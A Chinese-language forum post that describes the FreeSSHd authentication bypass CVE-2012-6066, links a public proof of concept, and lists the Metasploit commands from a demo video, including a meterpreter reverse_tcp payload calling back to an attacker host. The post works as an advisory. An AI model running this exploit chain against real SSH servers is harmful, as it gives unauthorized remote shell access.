設為首頁收藏本站
開啟輔助訪問 切換到窄版

微剋多資訊

 找回密碼
 註冊

Sign in with google

Google帳號登入

搜索
返回列表 發新帖
回覆 1則 瀏覽 14325篇
Line

越過 FreeSSHd 的安全授權機制 (含影片示範)

z24374203

該用戶從未簽到

升級   24.29%

跳轉到指定樓層
主題
發表於 2013-1-16 17:47 | 只看該作者 回帖獎勵 |倒序瀏覽 |閱讀模式
主題:越過 FreeSSHd 的安全授權機制 (含影片示範)

發佈日期:2010/08/11(首次發現)、2012/12/01(發佈PoC)

影響版本:Freesshd v 1.2.6 (含之前所有版本)

漏洞編號:CVE-2012-6066

說明:
FreeSSHd 一個免費的 SSH Server ,原本是用來確保網路連線安全的機制,現在被踢爆具有越過( By Pass)安全機制的方式。
你只需要使用預設的帳號(root),就可以越過加密金鑰的認證。

概念驗證程式(PoC)下載處:http://www.exploit-db.com/exploits/11842/

其它參考網站說明:http://www.securityfocus.com/bid/56785/info

影片內指令:
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run
use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo

From https://www.facebook.com/netwargame


樓主熱門主題
Facebook

使用道具 檢舉主題

divale

該用戶從未簽到

升級   0%

2F
發表於 2013-1-16 17:59 | 只看該作者
這玩意出了問題,竟然這麼久都沒修補,太可怕了
不敢用這軟體

使用道具

返回列表 發新帖
高級模式
B Color Image Link Quote Code Smilies
您需要登入後才可以回帖 登入 | 註冊

本版積分規則

本月熱門

更多>
 

小黑屋|Archiver|微剋多資訊(MicroDuo)

GMT+8, 2024-4-19 20:01

Discuz! X

© 2009-2023 Microduo

快速回覆 返回頂部 返回列表